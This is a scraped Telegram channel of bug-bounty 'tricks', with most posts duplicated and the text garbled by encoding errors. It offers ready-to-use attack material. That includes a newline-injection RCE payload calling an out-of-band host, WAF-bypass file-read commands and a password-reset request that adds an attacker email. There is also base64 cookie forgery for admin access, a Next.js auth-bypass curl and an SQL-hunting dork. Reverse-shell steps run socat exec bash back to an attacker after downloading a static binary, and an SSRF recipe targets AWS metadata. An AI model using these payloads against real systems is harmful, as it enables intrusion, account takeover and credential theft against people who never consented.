π₯Never forget to check for blind RCE!π₯
I was testing a login panel and had a gut feeling the username field might be vulnerable. I tried some classic payloads like:
;id | whoami & uname
But... firewall detected and blocked them all.
Even when I tried curl or ping for blind RCE β still blocked.
Then I thought: maybe the WAF is only scanning the first line of the input? So why not try a little trick?
Payload idea: Inject a newline before the actual payload:
attacker'%0acurl https://tluxnubdqopuwecbljrj5i6tot8ddd64b.oast.fun
(Use %0a for newline β URL encoded)
And boom β Blind RCE triggered! My server got the hit instantly.
Cybersecurity isnβt about effort β itβs about mindset. Deep thinking always wins over brute force.β€οΈ
DarkShadow
I was testing a login panel and had a gut feeling the username field might be vulnerable. I tried some classic payloads like:
;id | whoami & uname
But... firewall detected and blocked them all.
Even when I tried curl or ping for blind RCE β still blocked.
Then I thought: maybe the WAF is only scanning the first line of the input? So why not try a little trick?
Payload idea: Inject a newline before the actual payload:
attacker'%0acurl https://tluxnubdqopuwecbljrj5i6tot8ddd64b.oast.fun
(Use %0a for newline β URL encoded)
And boom β Blind RCE triggered! My server got the hit instantly.
Cybersecurity isnβt about effort β itβs about mindset. Deep thinking always wins over brute force.β€οΈ
DarkShadow
β€34π9π₯7π³3
π₯You can findπ₯
Broken access control to idor vulnerability:
using this simple tricks (effective for .net webapps and sometimes work in php based webapps)π§π
target.com/hidden this page required authentication or redirect to /login page.
Try: target.com/login/hidden
OMG! Auth bypass β
Broken access control to idor vulnerability:
using this simple tricks (effective for .net webapps and sometimes work in php based webapps)π§π
target.com/hidden this page required authentication or redirect to /login page.
Try: target.com/login/hidden
OMG! Auth bypass β
π19π€12β€7π₯3
Password Reset Bypass Trick π
Some poorly secured endpoints accept multiple email parameters.π³
Try this:
POST /passwordReset HTTP/1.1
Content-Type: application/x-www-form-urlencoded
[email protected]&[email protected]
Or in JSON:
{
"email": ["[email protected]", "[email protected]"]
}
If the app sends the reset link to both emailsβ¦ youβre in.β‘
Now imagine if the victim is an admin β hello dashboard, hello bounty!π°
#bugbountytips
Some poorly secured endpoints accept multiple email parameters.π³
Try this:
POST /passwordReset HTTP/1.1
Content-Type: application/x-www-form-urlencoded
[email protected]&[email protected]
Or in JSON:
{
"email": ["[email protected]", "[email protected]"]
}
If the app sends the reset link to both emailsβ¦ youβre in.β‘
Now imagine if the victim is an admin β hello dashboard, hello bounty!π°
#bugbountytips
π28β€9π¨βπ»6π₯1π€1π1π³1
Recently disclosed hackerone critical bug, which can exploitable under few minutes!
POC:
GET /reports/***.json HTTP/2
Host: hackerone.com
If you all guys interested to know simple and Smart tricks β never forget to react β€οΈ
POC:
GET /reports/***.json HTTP/2
Host: hackerone.com
If you all guys interested to know simple and Smart tricks β never forget to react β€οΈ
β€77π16πΏ11π₯5π2
A simple hunt can flip the whole game!π
While testing a web app, I noticed this suspicious-looking session cookie:
I quickly ran it through Base64 decoding:
Wow π³ β it's a JSON-style string in plain Base64.
Time to see how deep the rabbit hole goes...
I modified the role from user to admin:
Then replaced the cookie:
BOOM π₯ Instantly, we got admin access!π₯
Follow me ππΌ ...DarkShadow...
While testing a web app, I noticed this suspicious-looking session cookie:
Cookie: session=e3VzZXI6ZGFya3NoYWRvdyxyb2xlOnVzZXJ9Cg==I quickly ran it through Base64 decoding:
echo "e3VzZXI6ZGFya3NoYWRvdyxyb2xlOnVzZXJ9Cg==" | base64 -d
{user:darkshadow,role:user}
Wow π³ β it's a JSON-style string in plain Base64.
Time to see how deep the rabbit hole goes...
I modified the role from user to admin:
echo "{user:darkshadow,role:admin}" | base64
e3VzZXI6ZGFya3NoYWRvdyxyb2xlOmFkbWlufQo=
Then replaced the cookie:
Cookie: session=e3VzZXI6ZGFya3NoYWRvdyxyb2xlOmFkbWlufQo=BOOM π₯ Instantly, we got admin access!π₯
Follow me ππΌ ...DarkShadow...
X (formerly Twitter)
DarkShadow (@darkshadow2bd) on X
Ethical Hacker | Penetration Tester | Security Researcher | Bug Hunter | Exploit Developer.
π₯~For more Join my New telegram ChannelππΌ https://t.co/9p1yvzluA4 β¨
π₯~For more Join my New telegram ChannelππΌ https://t.co/9p1yvzluA4 β¨
π13π₯10π3
π€«Everyone Let's dive deep into the art of WAF bypass techniques β a must-know skill for every serious bug bounty hunter.β‘
β‘Bypass Series for bug huntersπ
Part-1
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
Follow meππΌ DarkShadow
#Bugbountytips #series
β‘Bypass Series for bug huntersπ
Part-1
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
tac /etc/hosts - π§ββοΈ man /etc/hosts - πnl /etc/hosts - π€―less /etc/hosts - π€«more /etc/hosts - πstrings /etc/hosts - πtail /etc/hosts - π
head /etc/hosts -π₯±Follow meππΌ DarkShadow
#Bugbountytips #series
X (formerly Twitter)
DarkShadow (@darkshadow2bd) on X
Ethical Hacker | Penetration Tester | Security Researcher | Bug Hunter | Exploit Developer.
π₯~For more Join my New telegram ChannelππΌ https://t.co/9p1yvzluA4 β¨
π₯~For more Join my New telegram ChannelππΌ https://t.co/9p1yvzluA4 β¨
π₯21β€6π4
This media is not supported in your browser
VIEW IN TELEGRAM
π€£17π6π1
β‘Bypass Series for bug huntersπ
Part-2
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
perl -pe '' /etc/hosts
Follow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
Part-2
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
xxd -p /etc/hosts | xxd -p -rxargs -d '\n' -I{} echo {} < /etc/hostsperl -pe '' /etc/hosts
sed '' /etc/hostsawk '{print}' /etc/hostsdd if=/etc/hosts 2>/dev/nullFollow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
π₯17π6
π₯With the right dork, the whole game changesβrecon becomes domination.π
Dork:
For more followππΌ DarkShadow
#bugbountytips
Dork:
inurl:search.php inurl:sqlQuery inurl:&For more followππΌ DarkShadow
#bugbountytips
π17π₯5β€1π1π³1
π This is wild!
Youβve probably seen the buzz around the Next.js middleware auth bypass (CVE-2025-29927) β but thereβs another less-known yet similar vulnerability: CVE-2024-51479.
This flaw allows attackers to bypass authentication by abusing the __nextLocale query parameter in the URL, tricking the middleware into granting access to protected routes.
Proof of Concept (PoC):
This vulnerability was fixed in Next.js v14.2.15, and Vercel-hosted apps have already been patched automatically.
I found a very cool article explaining everything in detail:
https://gmo-cybersecurity.com/blog/another-nextjs-middleware-bypass-en
Youβve probably seen the buzz around the Next.js middleware auth bypass (CVE-2025-29927) β but thereβs another less-known yet similar vulnerability: CVE-2024-51479.
This flaw allows attackers to bypass authentication by abusing the __nextLocale query parameter in the URL, tricking the middleware into granting access to protected routes.
Proof of Concept (PoC):
curl https://target.com/?__nextLocale=/adminThis vulnerability was fixed in Next.js v14.2.15, and Vercel-hosted apps have already been patched automatically.
I found a very cool article explaining everything in detail:
π8β€5π₯5π3π«‘1
This media is not supported in your browser
VIEW IN TELEGRAM
π New Script Alert β Subdomain Monitoring (Coming Soon!)
from Brut Security
For those whoβve been waiting on a simple and efficient way to monitor subdomains automatically β your wait is almost over. π
Weβve been working on a Bash script that:
β Monitors your target domains every 6 hours
β Uses subfinder, anew, and notify
β Sends actual new subdomains as file attachments directly to your Discord webhook
β Clean, lightweight & made for practical usage in recon and bug bounty
The release isnβt today β dropping next week, but thought Iβd give you all a heads-up.
If youβre into bug hunting, automation, or OSINT β this might be super useful for your workflow.
π Share with your team
β€οΈ React if youβre excited
Letβs get the word out before the launch!
#BrutSecurity #bugbounty #subdomainmonitoring #infosec #recon #bashscript #automation
from Brut Security
For those whoβve been waiting on a simple and efficient way to monitor subdomains automatically β your wait is almost over. π
Weβve been working on a Bash script that:
β Monitors your target domains every 6 hours
β Uses subfinder, anew, and notify
β Sends actual new subdomains as file attachments directly to your Discord webhook
β Clean, lightweight & made for practical usage in recon and bug bounty
The release isnβt today β dropping next week, but thought Iβd give you all a heads-up.
If youβre into bug hunting, automation, or OSINT β this might be super useful for your workflow.
π Share with your team
β€οΈ React if youβre excited
Letβs get the word out before the launch!
#BrutSecurity #bugbounty #subdomainmonitoring #infosec #recon #bashscript #automation
21β€30π6π₯4π2
API_Hacking_with_Javascript_Checklist.pdf
47.1 MB
API Hacking with Javascript Checklist - 5 things that you should look for in JS files for API hacking.
π₯22β€13
β‘Convert your basic nc reverse shell to a pro interactive shellπ
β‘Bash Series for bug huntersπ
Part-1
Use python to Spawn a TTY shell:
Use this command to use clear command:
Get a sexy shell prompt:
Use those alias for speed up:
To close the shell temporally:
Press control+Z
Use this command to back again session:
Guys, do you all want a smart alternative to nc where you can use nano, vim, and have full keyboard controls (like Ctrl+C, etc.)?
πFollow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
β‘Bash Series for bug huntersπ
Part-1
Use python to Spawn a TTY shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'Use this command to use clear command:
export TERM=xterm-256colorGet a sexy shell prompt:
PS1='\[\033[01;32m\]\u@\h \[\033[01;34m\]\w\[\033[01;31m\]$\[\033[00m\] 'Use those alias for speed up:
export EDITOR=nano
alias mm=clear
alias ls='ls --color=auto'
alias ll='ls -la --color=auto'
alias grep='grep --color=auto'To close the shell temporally:
Press control+Z
Use this command to back again session:
stty raw -echo; fgGuys, do you all want a smart alternative to nc where you can use nano, vim, and have full keyboard controls (like Ctrl+C, etc.)?
πFollow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
π₯10πΏ8π5
β‘Bypass Series for bug huntersπ
Part-3
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
πFollow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
Part-3
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
cat < /etc/hostscat /proc/self/fd/0 < /etc/hostscat /etc/hosts | base64 | base64 -dcat /etc/hosts | string collectcat /etc/hosts | while read line; echo $line; end
echo (cat /etc/hosts)
πFollow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
π8β€5π₯3
β‘Bash Series for bug huntersπ
Part-2
Stop using directly nc and try with the following command:
Or
Now you can use arrow keys for command history navigation, but you still won't get full keyboard functionality (e.g., nano, CTRL shortcuts).
For full interactive keyboard controls, use a socat interactive shell:
On attacker side:
If it throws any error, try:
socat file:$(tty),raw,echo=0 tcp-listen:<port>
On victim side (for a full TTY reverse shell):
If socat is not installed on the victim machine, use this one-liner to download a static binary:
to stop socat:
Note: Replace <port> with your desired port, <attacker_ip> with your IP, and <PID> with the process ID.
πFollow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
Part-2
Stop using directly nc and try with the following command:
rlwrap -cAr nc -lvnp <port>Or
rlwrap -f . -r nc -lnvp <port>Now you can use arrow keys for command history navigation, but you still won't get full keyboard functionality (e.g., nano, CTRL shortcuts).
For full interactive keyboard controls, use a socat interactive shell:
On attacker side:
socat file:tty,raw,echo=0 tcp-listen:<port>If it throws any error, try:
socat file:$(tty),raw,echo=0 tcp-listen:<port>
On victim side (for a full TTY reverse shell):
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<ip>:<port>If socat is not installed on the victim machine, use this one-liner to download a static binary:
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<ip>:<port>to stop socat:
ps aux | grep socatKill -9 socat <PID>Note: Replace <port> with your desired port, <attacker_ip> with your IP, and <PID> with the process ID.
πFollow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
π₯9β€2π1
β‘HackerOne was vulnerable to a critical SSRF that allowed reading AWS metadata β disclosed and rewarded $25,000! π€―
π The Core Issue:
An SSRF via a <template> field allowed AWS credential access by injecting an <iframe> when generating a PDF report from analytics.
POC Steps:
1. Go to https://hackerone.com/organizations/ORG/analytics/reports
2. Create a new report
3. Select any filters
4. Click βApplyβ (intercept the request here)
5. In any template field, inject an HTML payload
6. Use an <iframe> to read internal files like AWS metadata
Even though it's an old report, the technique builds solid SSRF understanding.
If you're into smart and simple exploitation tricks β donβt forget to react & share β€οΈ
πFollow meππΌ DarkShadow
π The Core Issue:
An SSRF via a <template> field allowed AWS credential access by injecting an <iframe> when generating a PDF report from analytics.
POC Steps:
1. Go to https://hackerone.com/organizations/ORG/analytics/reports
2. Create a new report
3. Select any filters
4. Click βApplyβ (intercept the request here)
5. In any template field, inject an HTML payload
6. Use an <iframe> to read internal files like AWS metadata
Even though it's an old report, the technique builds solid SSRF understanding.
If you're into smart and simple exploitation tricks β donβt forget to react & share β€οΈ
πFollow meππΌ DarkShadow
π₯28β€10πΏ9π5π«‘2
This is really cool π₯
An FFUF wrapper by @rez0__ that automatically suggests file extensions for fuzzing by analysing target URL and headers.
https://github.com/jthack/ffufai?tab=readme-ov-file
#bugbountytips #bugbounty #cybersecurity
An FFUF wrapper by @rez0__ that automatically suggests file extensions for fuzzing by analysing target URL and headers.
https://github.com/jthack/ffufai?tab=readme-ov-file
#bugbountytips #bugbounty #cybersecurity
π13π₯2